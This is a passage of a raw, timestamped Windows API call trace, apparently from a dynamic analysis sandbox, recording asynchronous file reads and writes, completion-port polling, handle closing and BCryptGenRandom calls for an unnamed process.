lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.256] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x146b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.275] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13b00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.293] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x15840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.359] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x16f00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.756] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x15410, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.826] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0191.594] CloseHandle (hObject=0x330) returned 1 [0191.594] free (_Block=0x1ff1e60) [0191.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0191.594] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0191.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.018] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0192.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.047] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0192.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.065] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0192.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.078] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.092] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0192.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.103] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.114] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0192.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.123] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.139] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0192.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.147] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0192.162] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0192.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.402] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.460] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.471] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0193.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.481] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x3bf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0193.481] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.489] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0193.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0193.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0193.498] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.498] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.498] free (_Block=0x3e305b8) [0193.498] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.498] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.498] free (_Block=0x1fa91d0) [0193.499] free (_Block=0x1fa2ed8) [0193.499] free (_Block=0x1fa90b8) [0193.499] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0193.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0193.509] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.509] free (_Block=0x3e305b8) [0193.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.509] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.509] free (_Block=0x1fa91d0) [0193.509] free (_Block=0x1fa2ed8) [0193.509] free (_Block=0x1fa90b8) [0193.509] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0193.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0193.520] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.520] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.520] free (_Block=0x3e305b8) [0193.520] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.520] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.520] free (_Block=0x1fa91d0) [0193.521] free (_Block=0x1fa2ed8) [0193.521] free (_Block=0x1fa90b8) [0193.521] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0193.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.543] CloseHandle (hObject=0x330) returned 1 [0193.544] free (_Block=0x3d70450) [0193.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.549] CloseHandle (hObject=0x3cc) returned 1 [0193.549] free (_Block=0x3f70048) [0193.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.549] CloseHandle (hObject=0x308) returned 1 [0193.549] free (_Block=0x3e70008) [0193.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.550] CloseHandle (hObject=0x338) returned 1 [0193.550] free (_Block=0x1ff1e60) [0193.550] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.552] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.554] CloseHandle (hObject=0x170) returned 1 [0193.554] free (_Block=0x3df0008) [0193.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.697] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0193.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.697] CloseHandle (hObject=0x2a8) returned 1 [0193.698] free (_Block=0x3ef0008) [0193.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.721] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.724] CloseHandle (hObject=0x2a8) returned 1 [0193.724] free (_Block=0x3df0008) [0193.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.736] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.737] CloseHandle (hObject=0x170) returned 1 [0193.737] free (_Block=0x1ff1e60) [0193.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.754] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.754] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.757] CloseHandle (hObject=0x2a8) returned 1 [0193.757] free (_Block=0x3df0008) [0193.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.766] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.768] CloseHandle (hObject=0x170) returned 1 [0193.768] free (_Block=0x1ff1e60) [0193.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.784] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.785] CloseHandle (hObject=0x170) returned 1 [0193.785] free (_Block=0x3df0008) [0193.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.797] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 